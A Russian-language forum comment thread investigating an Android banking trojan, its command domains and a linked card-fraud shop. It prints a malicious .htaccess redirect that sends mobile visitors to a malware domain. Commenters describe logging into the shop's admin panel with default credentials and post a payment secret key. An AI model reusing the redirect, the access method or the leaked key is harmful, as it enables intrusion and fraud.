Как стать автором
Поиск
Написать публикацию
Обновить

Комментарии 71

Тут 2 варианта: либо вирус «китайского происхождения», либо ошибка кодировки. Думаю, пока рано делать выводы.

Возможно, что это такая обфускация.
Так же рекомендую параллельно использовать Fern Flower.
Рейтинг скрыт
Возможно, т.к. полностью не получилось восстановить код, не могу с уверенностью что то сказать, можно посмотреть «Класс расшифровки» сверху.
Рейтинг скрыт
Что-то слишком грустно звучит «Не устанавливайте root и банк-клиент на одно устройство»

Как я понимаю, если зловред объявился, есть возможность этот момент контролировать через «Разрешения суперпользователя»?
Так-то устанавливаемые приложения под контролем, но мало ли
Рейтинг скрыт
его не удалить через стандартный менеджер приложений андроида, он выключает кнопки остановить и удалить. И не просит рут прав, просто падает когда кликаем на .apk. После он уже свое делает.
Рейтинг скрыт
Вы меня немного не так поняли =)
Я про общую картину: практически любой зловред, использующий рут, может быть обнаружен стандартными средствами?
Рейтинг скрыт
а что вы имеете ввиду под стандартными методами? )
Рейтинг скрыт
Под стандартными я имел ввиду приложение Superuser, стоящее практически на всех рутованных устройствах, в котором можно контролировать все приложения, требующие root-права
Рейтинг скрыт
он был, но например 4.1.1 на телефоне он спросил хочешь дать права, на планшете он байпаснул как то
Рейтинг скрыт
То есть, на телефоне еще была возможность предотвратить «вторжение» на этом уровне?
Насчет планшета: может есть различия в настройках безопасности?

Судя по всему, не так всё и плохо может быть с рутованными устройствами
Рейтинг скрыт
Извиняюсь за назойливость, просто не могу понять такого ажиотажа вокруг безопасности устройств с root-ом.
Ведь можно обеспечить должный уровень безопасности, если правильно им пользоваться, а не направо и налево раздавать права и разрешения
Рейтинг скрыт
минимальное — использовать хоть какой то нормальный антивирус для мобилы и таба. Я пока что не знаю почему и как он обходил, думаю в будущем разберемся, напишу новую статью. Не надо извинений ) рад ответить на вопросы )
Рейтинг скрыт
Насчет антивируса, по-моему, тоже спорный момент =)
А так, думаете, что контроль root-разрешений и отключение установки приложений из неизвестных источников не могут обеспечить должный уровень безопасности?
У меня, кстати, на выдачу root прав пароль стоит, чтобы не выдать их случайным нажатием на всплывшее окно, а в обычном состоянии root отключен
Рейтинг скрыт
согласен, тоже вариант =)
Рейтинг скрыт
НЛО прилетело и опубликовало эту надпись здесь
теоретически нет. Примерный кейс:
Получаем рут права.
Добавляем в систему свой бинарник для рута.
Удаляем данные у SuperSu (или аналога).
Рейтинг скрыт
Просто, для примера, начиная с 9-й версии CyanogenMod появился пункт в настройках, позволяющий отключать root как для приложений, так и для ADB.
Вот и задаюсь вопросом, насколько это может быть безопасно против зловредов
Рейтинг скрыт
Пробежал http сканнером, нашел стату и админку:

abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control

Далее погуглил по строке KeyHttpGate (http://avtesterr.com/venussa/gate.php содержит строку «KeyHttpGate abra-k0dabra.com/magic/gate.php» — видимо это механизм смены гейта),
нашел док.
Там указано имя малвари — Android/Crosate.A

Нашел несколько сандбокс анализов подобного, с 2013 года:
www.apk-analyzer.net/analysis/2683/13582/0/html
www.apk-analyzer.net/analysis/2230/11392/0/html
www.apk-analyzer.net/analysis/718/3954/0/html

Гейты малвари в .ru зоне, что не исключает «русский» след в самом начале жизни этого софта — тестили.

В этом пдфе немного описано про детект эмулятора в этой малвари.

Вот скан VT, тоже за 2013 год:
www.virustotal.com/en/file/964f6c1913c8f090cbcabb0f23d26e0a89408c1f2dda43a087159463bb3e07e7/analysis

Тут инфа посвежее:
malvertising.stopmalwares.com/2015/03/malvertising-androidsvpeng-androidcrosate-androiddeng
www.virustotal.com/en/file/324357f628d534eeae1674e6c3af9f3d4fad3e0dda5bc3fb782f1ed3b9a37dd8/analysis
Рейтинг скрыт
abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control

мы тоже находили, но дальше не ходили…
Рейтинг скрыт
Регнул один из старых доменов private-area.ru, на которых был gate.php, просмотрим, стучит ли ещё кто туда
Рейтинг скрыт
По инфе с VT этом же сервере есть домен heibe-titten.com
Там PMA: heibe-titten.com/phpMyAdmin и гейт heibe-titten.com/dnr/gate.php
Домен регнут на armyawka@inbox.ru — секретный вопрос «Модель Вашей первой машины», на это же мыло регнуты: 

abra-k0dabra.com	[ 62.210.83.135 ]
anonyzmus.com		[ 62.210.78.48 ]
casino-ambassador.com	[ 62.210.86.232 ]
casino-olymnpic.com	[ 62.210.86.233 ]
esset-nod32.com		[ 178.33.225.144 ]
heibe-titten.com	[ 62.210.83.135 ]
jerking0ff.com		[ 62.210.244.63 ]
mego-bankasi.com	[ 37.187.138.222 ]
porabowenie.com		[ 62.210.244.63 ]
shortdomein.com		[ 62.210.78.19 ]
venuss-pizdenus.com	[ 62.210.244.71 ]

megogo-porn.com		[ не резолвится ]
megooshop.net		[ не резолвится ]
orgazm-girls.com	[ не резолвится ]
porno2000allin.com	[ не резолвится ]
privatbang.com		[ не резолвится ]
v-rozetke.com		[ не резолвится ]
girls-porno.net		[ не резолвится ]
Рейтинг скрыт
да, русский след на глаз…

Спасибо за дополнение.
Рейтинг скрыт
Или армянский (см. email).
Рейтинг скрыт
если на секретный вопрос подойдет «ВАЗ 2121», то и к гадалке ходить не надо…
Рейтинг скрыт
Идём дальше.

Нашел через гугление полей домена нашел ещё один интересный домен, регнутый на armyawka@inbox.ru — apple-sh0p.com, IP: 37.252.0.192
на сайте указан номер: +7 (800) 100-22-69
CMS webassyst, по урлу 37.252.0.192 доступна админка.

Классика!
Логин-пароль admin:admin

Смотрим первый заказы в базе:

Заказ создан: 25 января 2015 10:08
Витрина: apple-sh0p.com
IP-адрес: 92.244.135.215 — Сербия

Скачиваем лог установки, находим путь на диске разработчика сайта: «D:\\Programs\\OpenServer\\domains\\shop-script.loc\\»
В общем-то реквизиты с сайта ведут на разработчика малвари или человека, с ним связанного, и судя по содержимому магазина — товар скарженный. Источник кредитных карт — вполне вероятно та самая малварь.
Рейтинг скрыт
Мдя, пароль тут же сменили)
Рейтинг скрыт
видимо чуваки с паяльниками уже доехали )
Рейтинг скрыт
Хабру читают.
Рейтинг скрыт
Логи с сервера:
pastebin.com/WjTFvi5J
pastebin.com/35XAXXZL
pastebin.com/3L0Nykm0

Данные UNITPAY, по которым можно идентифицировать лицо, владеющее шопом:
Публичный ключ 12475-d1305
Секретный ключ 7b924291b516d1b406b3fb278b45ae04


Рейтинг скрыт
504 Gateway Time-out
nginx/1.7.0

Самое интересное, что такая реакция лишь доказывает то, что след был верным.
Через 10 минут после публикации доступов admin:admin они были изменены(тут я допускаю возможность смены аноном с хабра), но то, что сервер выключили, уже второй аргумент в пользу того, что шоп apple-sh0p.com аффилирован с малварей Android/Crosate.
Исходя из моей подготовки и опыта:), могу утверждать с высокой долей вероятности, что идентификация кардера упирается в запросе информации о вышеуказанных ключах через UNITPAY и уточнению владельца номера +7 (800) 100-22-69.
Рейтинг скрыт
Я не отрицаю ничего, но это также может значить, что на сайт вломились анонимы с хабра и начали его ломать. Вот его и выключили.
Рейтинг скрыт
Конечно может, но там внизу у хабраюзера receiver есть данные на покупателя обфускатора, и если обе ниточки сойдутся, то тут уже не отвертеться
Рейтинг скрыт
Такая защита — это результат работы одной из версий нашего продукта DexProtector, к сожалению, иногда, среди наших хороших клиентов, попадаются злые негодяи, которые во-первых портят себе карму и вредят пользователям Android, а во вторых приводят к false positive антивирусов для нормальных защищенных приложений, соответственно, вредят и нам. Если не сложно, можете прислать нам этот apk, для того чтобы мы разобрались с этим нехорошим человеком?

Спасибо за пост.
Рейтинг скрыт
Чувака нашли, бригада с паяльниками выехала :-)
Рейтинг скрыт
:-) хехе
Рейтинг скрыт
А у Вас криптор-обфускатор водяные знаки вставляет с идентификатором покупателя?
Рейтинг скрыт
Мы вынуждены вставлять водяные знаки, как раз из-за таких случаев, чтобы иметь возможность блокировать лицензию.
Рейтинг скрыт
Это нормально, отслеживание судьбы купленной лицензии вполне себе верный ход. А как вы блокировать будете? Сам криптор онлайн или программа при каждом запуске в сеть идёт?
Рейтинг скрыт
Если не секрет, то по каким следам нашли? Жёлтые точки?
Кстати, в этом случае я даже за, если знаете только вы и «честно-честно» только вы.
(комменты пиши @ страницу не обновляй)
Рейтинг скрыт
Всё так.
Рейтинг скрыт
что за «желтые точки»???
вот интересно ведь, но не понятно. У вас какой-то междусобойчик
Рейтинг скрыт
Надеюсь, о результатах этой истории хотя бы в комментариях отпишитесь? Заинтриговали =)
Рейтинг скрыт
«По предварительным данным, сумма предотвращенного ущерба составляет более 50 миллионов рублей.»

Интересно, автору статьи хотябы «спасибо» сказали?
Рейтинг скрыт
это не тот вирус, название вируса который я исследовал и вируса который использовался не совпадают.
Рейтинг скрыт
Спасибо автору за рассказ об инструментах. Как раз есть желание поковырять одно приложение =)
А может ещё кто-то знает про написание приложений на mono (тот что открытый .net)? Судя пл всему интересующее меня приложение его использует.
Рейтинг скрыт
А скиньте архив в личку :)
Рейтинг скрыт
Тут 2 варианта: либо вирус «китайского происхождения», либо ошибка кодировки. Думаю, пока рано делать выводы.

Там дикая смесь из корейских и китайских иероглифов + еще какая-то фигня. Так что происхождение здесь точно не причем.
Рейтинг скрыт
Выяснили же, что это результат работы обфускатора со строками — строки заворачиваются в вызов функции, и инлайном передаётся зашифрованная строка в формате \uXXXX\uXXXX\uXXXX\uXXXX\uXXXX\uXXXX\uXXXX\uXXXX
JD-GUI такие строки пытается сразу привести к символу, и в итоге видим иероглифы.
Рейтинг скрыт
Я вот только одного не понял, как оно установилось то? Может упущенны какие-то подробности установки?

| заметите, он меня не спросил: «Ты согласен установить это приложение? Оно будет использовать такие-то права.»
Рейтинг скрыт
просто кликаешь на apk и все, он уже установлен
Рейтинг скрыт
Установлен ли «Unknown sources», есть ли права root, контролируется ли предоставление привилегий?
Если на все вопросы ответ нет, тогда уязвимость сосвсем в другом и уже нужно подумать о безопасности самой системы?
P.S. Какая версия android стояла?
Рейтинг скрыт
1. да рут на системе есть + Unknown sources, возможно как то Genymotion сглупил… почему бы и нет, вполне возможно… хотя андроид в одном случае спросил хочешь дать ему рут в другом нет, разные эмуляторы…
2. мне хотелось больше всего понять для чего он нужен, для кражи смс, банковский или…
Рейтинг скрыт
Комменты оказались не менее интересны чем статья. Целый детектив.
Пил кофе и с большим интересом читал.

Спасибо.
Рейтинг скрыт
Не хватает только комментариев от авторов трояна в духе:

— Они за нами выехали
— Они больше не будут
— Они пили кофе, с интересом читали и отключали сервера
— Они уже пакуют чемоданы
— Оказалось, что паяльник очень горячий

(нужное подчеркнуть)
Рейтинг скрыт
Это ещё не всё — я регнул один из старых доменов private-area.ru и на данный момент зафиксировал за 8 часов обращения ботов со 1240 IP адресов, раскиданных по миру.
Как соберу немного статистики, допишу в этот пост.
На данный момент собраны обращения к файлам:

/arigwfjlet.lui
/canada/gate.php
/china/gate.php
/estonia/gate.php
/evbkjnucvg.xky
/fkcdweleaj.xcz
/greatwall/gate.php
/israel/gate.php
/japan/gate.php
/kmepukizmy.qyx
/new/usb.php
/oxiqimfegl.swo
/plvkmxoeuc.vut
/reich/die_antwoord.php
/ugvodldbcl.ont
/vietnam/gate.php
/xkey/xtrapay.php
/ykey/xtrapay.php
/zkey/xpay.php
/zkey/xtrapay.php
Рейтинг скрыт
Вы бы поаккуратнее с такими регистрациями. Понятно, что дело интересное. Но сейчас создателей вируса взяли и начнут собирать доказательства по этому делу, а там домены из их пачки зарегистрированные на Вас. Может не очень приятная ситуация получиться.
Рейтинг скрыт
А ничего, что история владения доменом публично доступна и предыдущего владельца найти не проблема?
Да и новый владелец как бы не несёт ответственности за то, что ранее делали с этим доменом, пусть сначала докажут
Рейтинг скрыт
Доказывать это — приятного мало.
Рейтинг скрыт
Спасибо за предупреждение. Именно для этого я повесил сразу информационную заглушку на все запросы. Надеюсь органы обладают компитентностью)
Рейтинг скрыт
Домен private-area.ru также участвовал в 2013 году во взломе форумов на VB.
Злоумышленники добавляли на сайты следующий код в .htaccess:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://private-area.ru/retro/ [L,R=302]
#########!rataman!#########

Видимо взлом форумов был первичным источником трафика для Android/Crosate.A, мобильный трафик со сломанных сайтов пересылался на private-area.ru, далее какой-либо фейк обновления флеш-плеера, и дальше малварь попадала к пользователям на устройство.
Рейтинг скрыт
www.cnews.ru/top/2015/04/09/troyan_dlya_android_voruet_dengi_s_kart_sberbanka_594784

Троян для Android ворует деньги с карт Сбербанка

Пока не понятно совпадение или…

Я смс функционал тоже находил…
Рейтинг скрыт
А как пришли к выводу, что это именно те, а не другие?
Рейтинг скрыт
Я только по svpeng/crossate ориентируюсь, хотя да, малварь одного семейства может десяток мелких самостоятельных группировок использовать.
Рейтинг скрыт
Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Публикации

Ваш аккаунт

Разделы

Информация

Услуги

Техническая поддержка
© 2006–2025, Habr